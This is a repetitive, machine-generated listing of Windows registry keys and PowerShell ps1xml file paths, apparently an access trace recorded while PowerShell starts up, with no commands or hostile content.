HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
